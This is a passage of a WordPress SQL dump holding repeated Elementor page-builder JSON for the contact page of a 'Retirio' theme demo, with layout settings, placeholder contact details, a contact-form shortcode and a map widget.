right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_css_filter\":\"custom\",\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(2893,4724,'_elementor_page_assets','a:0:{}'),(2894,4724,'_elementor_pro_version','3.8.1'),(2895,4725,'_wp_page_template','elementor_header_footer'),(2896,4725,'_elementor_edit_mode','builder'),(2897,4725,'_elementor_template_type','wp-page'),(2898,4725,'_elementor_version','3.8.1'),(2899,4725,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(2900,4725,'_elementor_page_assets','a:0:{}'),(2901,4725,'_elementor_pro_version','3.8.1'),(2902,4726,'_wp_page_template','elementor_header_footer'),(2903,4726,'_elementor_edit_mode','builder'),(2904,4726,'_elementor_template_type','wp-page'),(2905,4726,'_elementor_version','3.8.1'),(2906,4726,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Feel free to get in touch with retirio\",\"description\":\"Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.\\n\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(2907,4726,'_elementor_page_assets','a:0:{}'),(2908,4726,'_elementor_pro_version','3.8.1'),(2909,4727,'_wp_page_template','elementor_header_footer'),(2910,4727,'_elementor_edit_mode','builder'),(2911,4727,'_elementor_template_type','wp-page'),(2912,4727,'_elementor_version','3.8.1'),(2913,4727,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\